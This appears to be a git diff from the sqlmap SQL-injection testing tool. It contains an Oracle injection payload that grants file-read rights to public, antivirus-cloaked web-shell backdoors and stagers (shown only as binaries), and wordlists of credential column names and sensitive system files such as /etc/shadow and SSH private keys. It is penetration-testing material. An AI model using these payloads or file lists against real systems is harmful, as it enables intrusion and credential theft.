SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL diff --git a/procs/postgresql/dns_request.sql b/data/procs/postgresql/dns_request.sql similarity index 80% rename from procs/postgresql/dns_request.sql rename to data/procs/postgresql/dns_request.sql index dd04d86632f..6724af223cc 100644 --- a/procs/postgresql/dns_request.sql +++ b/data/procs/postgresql/dns_request.sql @@ -1,4 +1,5 @@ DROP TABLE IF EXISTS %RANDSTR1%; +# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$ diff --git a/data/shell/README.txt b/data/shell/README.txt new file mode 100644 index 00000000000..4c64c411648 --- /dev/null +++ b/data/shell/README.txt @@ -0,0 +1,7 @@ +Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility. + +To prepare the original scripts to the cloaked form use this command: +find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \; + +To get back them into the original form use this: +find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \; diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_ new file mode 100644 index 00000000000..8d82ec3bd34 Binary files /dev/null and b/data/shell/backdoors/backdoor.asp_ differ diff --git a/data/shell/backdoors/backdoor.aspx_ b/data/shell/backdoors/backdoor.aspx_ new file mode 100644 index 00000000000..4b27111e5a5 Binary files /dev/null and b/data/shell/backdoors/backdoor.aspx_ differ diff --git a/data/shell/backdoors/backdoor.cfm_ b/data/shell/backdoors/backdoor.cfm_ new file mode 100644 index 00000000000..dce65debacb Binary files /dev/null and b/data/shell/backdoors/backdoor.cfm_ differ diff --git a/data/shell/backdoors/backdoor.jsp_ b/data/shell/backdoors/backdoor.jsp_ new file mode 100644 index 00000000000..c28a51a5abf Binary files /dev/null and b/data/shell/backdoors/backdoor.jsp_ differ diff --git a/data/shell/backdoors/backdoor.php_ b/data/shell/backdoors/backdoor.php_ new file mode 100644 index 00000000000..313b4a89b19 Binary files /dev/null and b/data/shell/backdoors/backdoor.php_ differ diff --git a/data/shell/stagers/stager.asp_ b/data/shell/stagers/stager.asp_ new file mode 100644 index 00000000000..424e85b64e6 Binary files /dev/null and b/data/shell/stagers/stager.asp_ differ diff --git a/data/shell/stagers/stager.aspx_ b/data/shell/stagers/stager.aspx_ new file mode 100644 index 00000000000..acbf840bc04 Binary files /dev/null and b/data/shell/stagers/stager.aspx_ differ diff --git a/data/shell/stagers/stager.cfm_ b/data/shell/stagers/stager.cfm_ new file mode 100644 index 00000000000..8193566e523 Binary files /dev/null and b/data/shell/stagers/stager.cfm_ differ diff --git a/data/shell/stagers/stager.jsp_ b/data/shell/stagers/stager.jsp_ new file mode 100644 index 00000000000..f1c0feb3384 Binary files /dev/null and b/data/shell/stagers/stager.jsp_ differ diff --git a/data/shell/stagers/stager.php_ b/data/shell/stagers/stager.php_ new file mode 100644 index 00000000000..945a37e80c4 Binary files /dev/null and b/data/shell/stagers/stager.php_ differ diff --git a/txt/common-columns.txt b/data/txt/common-columns.txt similarity index 90% rename from txt/common-columns.txt rename to data/txt/common-columns.txt index 101747d0845..a3d425bee12 100644 --- a/txt/common-columns.txt +++ b/data/txt/common-columns.txt @@ -1,5 +1,5 @@ -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission id name @@ -471,8 +471,10 @@ settingsid lname sale_date module_addr +flag # spanish + usuario nombre contrasena @@ -483,8 +485,11 @@ llave chaveta tono cuna +correo +contrasenia # german + benutzername benutzer passwort @@ -498,6 +503,7 @@ stichwort schlusselwort # french + utilisateur usager consommateur @@ -509,6 +515,7 @@ touche clef # italian + utente nome utilizzatore @@ -520,17 +527,109 @@ chiavetta cifrario # portuguese + usufrutuario chave cavilha # slavic + korisnik sifra lozinka kljuc +# turkish + +isim +ad +adi +soyisim +soyad +soyadi +kimlik +kimlikno +tckimlikno +tckimlik +yonetici +sil +silinmis +numara +sira +lokasyon +kullanici +kullanici_adi +sifre +giris +pasif +posta +adres +is_adres +ev_adres +is_adresi +ev_adresi +isadresi +isadres +evadresi +evadres +il +ilce +eposta +eposta_adres +epostaadres +eposta_adresi +epostaadresi +e-posta +e-posta_adres +e-postaadres +e-posta_adresi +e-postaadresi +e_posta +e_posta_adres +e_postaadres +e_posta_adresi +e_postaadresi +baglanti +gun +ay +yil +saat +tarih +guncelleme +guncellemetarih +guncelleme_tarih +guncellemetarihi +guncelleme_tarihi +yetki +cinsiyet +ulke +guncel +vergi +vergino +vergi_no +yas +dogum +dogumtarih +dogum_tarih +dogumtarihi +dogum_tarihi +telefon_is +telefon_ev +telefonis +telefonev +ev_telefonu +is_telefonu +ev_telefon +is_telefon +evtelefonu +istelefonu +evtelefon +istelefon +kontak +kontaklar + # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py) + user pass cc_number @@ -701,7 +800,9 @@ news nick number nummer +passhash pass_hash +password_hash passwordsalt personal_key phone @@ -754,6 +855,7 @@ xar_name xar_pass # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html + account accnts accnt @@ -823,6 +925,7 @@ user_pwd user_passwd # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047) + fld_id fld_username fld_password @@ -975,6 +1078,7 @@ yhmm yonghu # site:br + content_id codigo geometry @@ -1231,6 +1335,7 @@ newssummaryauthor and_xevento # site:de + rolle_nr standort_nr ja @@ -1393,6 +1498,7 @@ summary_id gameid # site:es + catid dni prune_id @@ -1482,6 +1588,7 @@ time_stamp bannerid # site:fr + numero id_auteur titre @@ -1533,6 +1640,7 @@ n_dir age # site:ru + dt_id subdivision_id sub_class_id @@ -1736,8 +1844,13 @@ banner_id error language_id val +parol +familiya +imya +otchestvo # site:jp + dealer_id modify_date regist_date @@ -1869,6 +1982,7 @@ c_commu_topic_id c_diary_comment_log_id # site:it + idcomune idruolo idtrattamento @@ -2372,6 +2486,7 @@ client_img does_repeat # site:cn + typeid cronid advid @@ -2545,3 +2660,195 @@ command brand_id disablepostctrl fieldname + +# site:id + +ajar +akses +aktif +akun +alamat +batas +cabang +deskripsi +foto +harga +hp +jeda +jenis +jml +judul +jumlah +kata_kunci +kata_sandi +katakunci +katasandi +kategori +kelas +keterangan +kode +kunci +lahir +nama +nama_akun +nama_ibu_kandung +nama_pengguna +namaakun +namapengguna +pekerjaan +pendidikan +pengguna +penjelasan +perusahaan +ponsel +profesi +ruang +sandi +soal +surat_elektronik +surel +tanggal +tanggal_lahir +telepon +tempat +tempat_lahir +tmp_lahir +universitas +urut +waktu + +# WebGoat + +cookie +login_count + +# https://sqlwiki.netspi.com/attackQueries/dataTargeting/ + +credit +card +pin +cvv +pan +password +social +ssn +account +confidential + +# site:nl + +naam +straat +gemeente +beschrijving +id_gebruiker +gebruiker_id +gebruikersnaam +wachtwoord +telefoon +voornaam +achternaam +geslacht +huisnummer +gemeente +leeftijd + +# site:cn + +yonghuming +mima +xingming +xingbie +touxiang +youxiang +shouji + +# Misc + +u_pass +hashedPw + +# password (international) + +adgangskode +aikotoba +amho +bimilbeonho +codewort +contrasena +contrasenya +contrasinal +esmeramz +facalfare +fjalekalim +focalfaire +gagtnabar +geslo +gozarvazhe +gunho +haslo +heslo +hudyat +igamalokungena +iphasiwedi +javka +jelszo +kadavucol +kalameobur +kalimatumurur +kalimatusirr +kalmarsirri +katalaluan +katasandi +kennwort +kodeord +kodikos +kouling +kupiasoz +kupuhipa +kupukaranga +kupuuru +kupuwhakahipa +losen +losenord +lozinka +lykilord +matkhau +mima +nenosiri +nywila +okwuntughe +oroasina +oroigbaniwole +paeseuwodeu +parol +parola +parolachiave +paroladordine +parole +paroli +parolja +parool +parulle +pasahitza +pasfhocal +pasowardo +passord +passwort +pasuwado +pasvorto +rahatphan +ramzobur +salasana +salasona +santoysena +senha +sifra +sifre +sisma +slaptazodis +synthimatiko +tunnussana +wachtwoord +wachtwurd +wagwoord diff --git a/data/txt/common-files.txt b/data/txt/common-files.txt new file mode 100644 index 00000000000..d64015805e8 --- /dev/null +++ b/data/txt/common-files.txt @@ -0,0 +1,1809 @@ +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# CTFs + +/flag +/flag.txt +/readflag + +# Reference: https://gist.github.com/sckalath/78ad449346171d29241a + +/apache/logs/access.log +/apache/logs/error.log +/bin/php.ini +/etc/alias +/etc/apache2/apache.conf +/etc/apache2/conf/httpd.conf +/etc/apache2/httpd.conf +/etc/apache/conf/httpd.conf +/etc/bash.bashrc +/etc/chttp.conf +/etc/crontab +/etc/crypttab +/etc/debian_version +/etc/exports +/etc/fedora-release +/etc/fstab +/etc/ftphosts +/etc/ftpusers +/etc/group +/etc/group- +/etc/hosts +/etc/http/conf/httpd.conf +/etc/httpd.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/acces_log +/etc/httpd/logs/acces.log +/etc/httpd/logs/access_log +/etc/httpd/logs/access.log +/etc/httpd/logs/error_log +/etc/httpd/logs/error.log +/etc/httpd/php.ini +/etc/http/httpd.conf +/etc/inetd.conf +/etc/inittab +/etc/issue +/etc/issue.net +/etc/lighttpd.conf +/etc/login.defs +/etc/mandrake-release +/etc/motd +/etc/mtab +/etc/my.cnf +/etc/mysql/my.cnf +/etc/openldap/ldap.conf +/etc/os-release +/etc/pam.conf +/etc/passwd +/etc/passwd- +/etc/password.master +/etc/php4.4/fcgi/php.ini +/etc/php4/apache2/php.ini +/etc/php4/apache/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/profile +/etc/proftp.conf +/etc/proftpd/modules.conf +/etc/protpd/proftpd.conf +/etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/redhat-release +/etc/resolv.conf +/etc/samba/smb.conf +/etc/security/environ +/etc/security/group +/etc/security/limits +/etc/security/passwd +/etc/security/user +/etc/shadow +/etc/shadow- +/etc/slackware-release +/etc/sudoers +/etc/SUSE-release +/etc/sysctl.conf +/etc/vhcs2/proftpd/proftpd.conf +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/logs/access.log +/logs/error.log +/opt/apache2/conf/httpd.conf +/opt/apache/conf/httpd.conf +/opt/xampp/etc/php.ini +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.default +/root/.bash_history +/root/.ssh/id_rsa +/root/.ssh/id_rsa.pub +/root/.ssh/known_hosts +/tmp/access.log +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.log +/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/httpd.conf +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +/usr/local/apache/logs/error. og +/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/vhosts.conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/httpd/conf/httpd.conf +/usr/local/lib/php.ini +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/Zend/etc/php.ini +/usr/sbin/pure-config.pl +/var/cpanel/cpanel.config +/var/lib/mysql/my.cnf +/var/local/www/conf/php.ini +/var/log/access_log +/var/log/access.log +/var/log/apache2/access_log +/var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +/var/log/error_log +/var/log/error.log +/var/log/httpd/access_log +/var/log/httpd/access.log +/var/log/httpd/error_log +/var/log/httpd/error.log +/var/log/messages +/var/log/messages.1 +/var/log/user.log +/var/log/user.log.1 +/var/www/conf/httpd.conf +/var/www/html/index.html +/var/www/logs/access_log +/var/www/logs/access.log +/var/www/logs/error_log +/var/www/logs/error.log +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default +/web/conf/php.ini + +# Reference: https://github.com/devcoinfet/Sqlmap_file_reader/blob/master/file_read.py + +/var/log/mysqld.log +/var/www/index.php + +# Reference: https://github.com/sqlmapproject/sqlmap/blob/master/lib/core/settings.py#L809-L810 + +/var/www/index.php +/usr/local/apache/index.php +/usr/local/apache2/index.php +/usr/local/www/apache22/index.php +/usr/local/www/apache24/index.php +/usr/local/httpd/index.php +/var/www/nginx-default/index.php +/srv/www/index.php + +/var/www/config.php +/usr/local/apache/config.php +/usr/local/apache2/config.php +/usr/local/www/apache22/config.php +/usr/local/www/apache24/config.php +/usr/local/httpd/config.php +/var/www/nginx-default/config.php +/srv/www/config.php + +# Reference: https://github.com/sqlmapproject/sqlmap/issues/3928 + +/srv/www/htdocs/index.php +/usr/local/apache2/htdocs/index.php +/usr/local/www/data/index.php +/var/apache2/htdocs/index.php +/var/www/htdocs/index.php +/var/www/html/index.php + +/srv/www/htdocs/config.php +/usr/local/apache2/htdocs/config.php +/usr/local/www/data/config.php +/var/apache2/htdocs/config.php +/var/www/htdocs/config.php +/var/www/html/config.php + +# Reference: https://www.gracefulsecurity.com/path-traversal-cheat-sheet-linux + +/etc/passwd +/etc/shadow +/etc/aliases +/etc/anacrontab +/etc/apache2/apache2.conf +/etc/apache2/httpd.conf +/etc/at.allow +/etc/at.deny +/etc/bashrc +/etc/bootptab +/etc/chrootUsers +/etc/chttp.conf +/etc/cron.allow +/etc/cron.deny +/etc/crontab +/etc/cups/cupsd.conf +/etc/exports +/etc/fstab +/etc/ftpaccess +/etc/ftpchroot +/etc/ftphosts +/etc/groups +/etc/grub.conf +/etc/hosts +/etc/hosts.allow +/etc/hosts.deny +/etc/httpd/access.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/access_log +/etc/httpd/logs/access.log +/etc/httpd/logs/error_log +/etc/httpd/logs/error.log +/etc/httpd/php.ini +/etc/httpd/srm.conf +/etc/inetd.conf +/etc/inittab +/etc/issue +/etc/lighttpd.conf +/etc/lilo.conf +/etc/logrotate.d/ftp +/etc/logrotate.d/proftpd +/etc/logrotate.d/vsftpd.log +/etc/lsb-release +/etc/motd +/etc/modules.conf +/etc/motd +/etc/mtab +/etc/my.cnf +/etc/my.conf +/etc/mysql/my.cnf +/etc/network/interfaces +/etc/networks +/etc/npasswd +/etc/passwd +/etc/php4.4/fcgi/php.ini +/etc/php4/apache2/php.ini +/etc/php4/apache/php.ini +/etc/php4/cgi/php.ini +/etc/php4/apache2/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/printcap +/etc/profile +/etc/proftp.conf +/etc/proftpd/proftpd.conf +/etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/putreftpd.pdb +/etc/redhat-release +/etc/resolv.conf +/etc/samba/smb.conf +/etc/snmpd.conf +/etc/ssh/ssh_config +/etc/ssh/sshd_config +/etc/ssh/ssh_host_dsa_key +/etc/ssh/ssh_host_dsa_key.pub +/etc/ssh/ssh_host_key +/etc/ssh/ssh_host_key.pub +/etc/sysconfig/network +/etc/syslog.conf +/etc/termcap +/etc/vhcs2/proftpd/proftpd.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/logs/pure-ftpd.log +/logs/security_debug_log +/logs/security_log +/opt/lampp/etc/httpd.conf +/opt/xampp/etc/php.ini +/proc/cpuinfo +/proc/filesystems +/proc/interrupts +/proc/ioports +/proc/meminfo +/proc/modules +/proc/mounts +/proc/stat +/proc/swaps +/proc/version +/proc/self/net/arp +/root/anaconda-ks.cfg +/usr/etc/pure-ftpd.conf +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/local/apache/conf/modsec.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/log +/usr/local/apache/logs +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access.log +/usr/local/apache/audit_log +/usr/local/apache/error_log +/usr/local/apache/error.log +/usr/local/cpanel/logs +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/stats_log +/usr/local/etc/httpd/logs/access_log +/usr/local/etc/httpd/logs/error_log +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/lib/php.ini +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.ini +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdn +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/www/logs/httpd_log +/usr/local/Zend/etc/php.ini +/usr/sbin/pure-config.pl +/var/adm/log/xferlog +/var/apache2/config.inc +/var/apache/logs/access_log +/var/apache/logs/error_log +/var/cpanel/cpanel.config +/var/lib/mysql/my.cnf +/var/lib/mysql/mysql/user.MYD +/var/local/www/conf/php.ini +/var/log/apache2/access_log +/var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +/var/log/apache-ssl/access.log +/var/log/apache-ssl/error.log +/var/log/auth.log +/var/log/boot +/var/htmp +/var/log/chttp.log +/var/log/cups/error.log +/var/log/daemon.log +/var/log/debug +/var/log/dmesg +/var/log/dpkg.log +/var/log/exim_mainlog +/var/log/exim/mainlog +/var/log/exim_paniclog +/var/log/exim.paniclog +/var/log/exim_rejectlog +/var/log/exim/rejectlog +/var/log/faillog +/var/log/ftplog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/httpd/access_log +/var/log/httpd/access.log +/var/log/httpd/error_log +/var/log/httpd/error.log +/var/log/httpsd/ssl.access_log +/var/log/httpsd/ssl_log +/var/log/kern.log +/var/log/lastlog +/var/log/lighttpd/access.log +/var/log/lighttpd/error.log +/var/log/lighttpd/lighttpd.access.log +/var/log/lighttpd/lighttpd.error.log +/var/log/mail.info +/var/log/mail.log +/var/log/maillog +/var/log/mail.warn +/var/log/message +/var/log/messages +/var/log/mysqlderror.log +/var/log/mysql.log +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql.log +/var/log/mysql/mysql-slow.log +/var/log/proftpd +/var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log +/var/log/secure +/var/log/vsftpd.log +/var/log/wtmp +/var/log/xferlog +/var/log/yum.log +/var/mysql.log +/var/run/utmp +/var/spool/cron/crontabs/root +/var/webmin/miniserv.log +/var/www/log/access_log +/var/www/log/error_log +/var/www/logs/access_log +/var/www/logs/error_log +/var/www/logs/access.log +/var/www/logs/error.log + +# Reference: https://nets.ec/File_Inclusion + +/etc/passwd +/etc/master.passwd +/etc/shadow +/var/db/shadow/hash +/etc/group +/etc/hosts +/etc/motd +/etc/issue +/etc/release +/etc/redhat-release +/etc/crontab +/etc/inittab +/proc/version +/proc/cmdline +/proc/self/environ +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/2 +/proc/self/fd/255 +/etc/httpd.conf +/etc/apache2.conf +/etc/apache2/apache2.conf +/etc/apache2/httpd.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/apache2/conf/httpd.conf +/etc/apache/conf/httpd.conf +/usr/local/apache2/conf/httpd.conf +/usr/local/apache/conf/httpd.conf +/etc/apache2/sites-enabled/000-default +/etc/apache2/sites-available/default +/etc/nginx.conf +/etc/nginx/nginx.conf +/etc/nginx/sites-available/default +/etc/nginx/sites-enabled/default +/etc/ssh/sshd_config +/etc/my.cnf +/etc/mysql/my.cnf +/etc/php.ini +/var/mail/www-data +/var/mail/www +/var/mail/apache +/var/mail/nobody +/var/www/.bash_history +/root/.bash_history +/var/root/.bash_history +/var/root/.sh_history +/etc/passwd +/etc/master.passwd +/etc/shadow +/var/db/shadow/hash +/etc/group +/etc/hosts +/etc/motd +/etc/issue +/etc/release +/etc/redhat-release +/etc/crontab +/etc/inittab +/proc/version +/proc/cmdline +/proc/self/environ +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/2 +/proc/self/fd/255 +/etc/httpd.conf +/etc/apache2.conf +/etc/apache2/apache2.conf +/etc/apache2/httpd.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/apache2/conf/httpd.conf +/etc/apache/conf/httpd.conf +/usr/local/apache2/conf/httpd.conf +/usr/local/apache/conf/httpd.conf +/etc/apache2/sites-enabled/000-default +/etc/apache2/sites-available/default +/etc/nginx.conf +/etc/nginx/nginx.conf +/etc/nginx/sites-available/default +/etc/nginx/sites-enabled/default +/etc/ssh/sshd_config +/etc/my.cnf +/etc/mysql/my.cnf +/etc/php.ini +/var/mail/www-data +/var/mail/www +/var/mail/apache +/var/mail/nobody +/var/www/.bash_history +/root/.bash_history +/var/root/.bash_history +/var/root/.sh_history +/usr/local/apache/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/httpd/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/etc/http/conf/httpd.conf +/etc/http/httpd.conf +/opt/apache/conf/httpd.conf +/opt/apache2/conf/httpd.conf +/var/www/conf/httpd.conf +/usr/local/php/httpd.conf +/usr/local/php4/httpd.conf +/usr/local/php5/httpd.conf +/etc/httpd/php.ini +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/local/etc/php.ini +/usr/local/lib/php.ini +/usr/local/php/lib/php.ini +/usr/local/php4/lib/php.ini +/usr/local/php5/lib/php.ini +/usr/local/apache/conf/php.ini +/etc/php4/apache/php.ini +/etc/php4/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/apache2/php.ini +/etc/php/php.ini +/etc/php/php4/php.ini +/etc/php/apache/php.ini +/etc/php/apache2/php.ini +/usr/local/Zend/etc/php.ini +/opt/xampp/etc/php.ini +/var/local/www/conf/php.ini +/etc/php/cgi/php.ini +/etc/php4/cgi/php.ini +/etc/php5/cgi/php.ini +/var/log/lastlog +/var/log/wtmp +/var/run/utmp +/var/log/messages.log +/var/log/messages +/var/log/messages.0 +/var/log/messages.1 +/var/log/messages.2 +/var/log/messages.3 +/var/log/syslog.log +/var/log/syslog +/var/log/syslog.0 +/var/log/syslog.1 +/var/log/syslog.2 +/var/log/syslog.3 +/var/log/auth.log +/var/log/auth.log.0 +/var/log/auth.log.1 +/var/log/auth.log.2 +/var/log/auth.log.3 +/var/log/authlog +/var/log/syslog +/var/adm/lastlog +/var/adm/messages +/var/adm/messages.0 +/var/adm/messages.1 +/var/adm/messages.2 +/var/adm/messages.3 +/var/adm/utmpx +/var/adm/wtmpx +/var/log/kernel.log +/var/log/secure.log +/var/log/mail.log +/var/run/utmp +/var/log/wtmp +/var/log/lastlog +/var/log/access.log +/var/log/access_log +/var/log/error.log +/var/log/error_log +/var/log/apache2/access.log +/var/log/apache2/access_log +/var/log/apache2/error.log +/var/log/apache2/error_log +/var/log/apache/access.log +/var/log/apache/access_log +/var/log/apache/error.log +/var/log/apache/error_log +/var/log/httpd/access.log +/var/log/httpd/access_log +/var/log/httpd/error.log +/var/log/httpd/error_log +/etc/httpd/logs/access.log +/etc/httpd/logs/access_log +/etc/httpd/logs/error.log +/etc/httpd/logs/error_log +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access_log +/usr/local/apache/logs/error.log +/usr/local/apache/logs/error_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/error.log +/usr/local/apache2/logs/error_log +/var/www/logs/access.log +/var/www/logs/access_log +/var/www/logs/error.log +/var/www/logs/error_log +/opt/lampp/logs/access.log +/opt/lampp/logs/access_log +/opt/lampp/logs/error.log +/opt/lampp/logs/error_log +/opt/xampp/logs/access.log +/opt/xampp/logs/access_log +/opt/xampp/logs/error.log +/opt/xampp/logs/error_log + +# Reference: https://github.com/ironbee/ironbee-rules/blob/master/rules/lfi-files.data + +/.htaccess +/.htpasswd +/access.log +/access_log +/apache/conf/httpd.conf +/apache/logs/access.log +/apache/logs/error.log +/apache/php/php.ini +/apache2/logs/access.log +/apache2/logs/error.log +/bin/php.ini +/boot.ini +/boot/grub/grub.cfg +/boot/grub/menu.lst +/config.inc.php +/error.log +/error_log +/etc/adduser.conf +/etc/alias +/etc/apache/access.conf +/etc/apache/apache.conf +/etc/apache/conf/httpd.conf +/etc/apache/default-server.conf +/etc/apache/httpd.conf +/etc/apache2/apache.conf +/etc/apache2/apache2.conf +/etc/apache2/conf.d/charset +/etc/apache2/conf.d/phpmyadmin.conf +/etc/apache2/conf.d/security +/etc/apache2/conf/httpd.conf +/etc/apache2/default-server.conf +/etc/apache2/envvars +/etc/apache2/httpd.conf +/etc/apache2/httpd2.conf +/etc/apache2/mods-available/autoindex.conf +/etc/apache2/mods-available/deflate.conf +/etc/apache2/mods-available/dir.conf +/etc/apache2/mods-available/mem_cache.conf +/etc/apache2/mods-available/mime.conf +/etc/apache2/mods-available/proxy.conf +/etc/apache2/mods-available/setenvif.conf +/etc/apache2/mods-available/ssl.conf +/etc/apache2/mods-enabled/alias.conf +/etc/apache2/mods-enabled/deflate.conf +/etc/apache2/mods-enabled/dir.conf +/etc/apache2/mods-enabled/mime.conf +/etc/apache2/mods-enabled/negotiation.conf +/etc/apache2/mods-enabled/php5.conf +/etc/apache2/mods-enabled/status.conf +/etc/apache2/ports.conf +/etc/apache2/sites-available/default +/etc/apache2/sites-available/default-ssl +/etc/apache2/sites-enabled/000-default +/etc/apache2/sites-enabled/default +/etc/apache2/ssl-global.conf +/etc/apache2/vhosts.d/00_default_vhost.conf +/etc/apache2/vhosts.d/default_vhost.include +/etc/apache22/conf/httpd.conf +/etc/apache22/httpd.conf +/etc/apt/apt.conf +/etc/avahi/avahi-daemon.conf +/etc/bash.bashrc +/etc/bash_completion.d/debconf +/etc/bluetooth/input.conf +/etc/bluetooth/main.conf +/etc/bluetooth/network.conf +/etc/bluetooth/rfcomm.conf +/etc/ca-certificates.conf +/etc/ca-certificates.conf.dpkg-old +/etc/casper.conf +/etc/chkrootkit.conf +/etc/chrootusers +/etc/clamav/clamd.conf +/etc/clamav/freshclam.conf +/etc/crontab +/etc/crypttab +/etc/cups/acroread.conf +/etc/cups/cupsd.conf +/etc/cups/cupsd.conf.default +/etc/cups/pdftops.conf +/etc/cups/printers.conf +/etc/cvs-cron.conf +/etc/cvs-pserver.conf +/etc/debconf.conf +/etc/debian_version +/etc/default/grub +/etc/deluser.conf +/etc/dhcp/dhclient.conf +/etc/dhcp3/dhclient.conf +/etc/dhcp3/dhcpd.conf +/etc/dns2tcpd.conf +/etc/e2fsck.conf +/etc/esound/esd.conf +/etc/etter.conf +/etc/exports +/etc/fedora-release +/etc/firewall.rules +/etc/foremost.conf +/etc/fstab 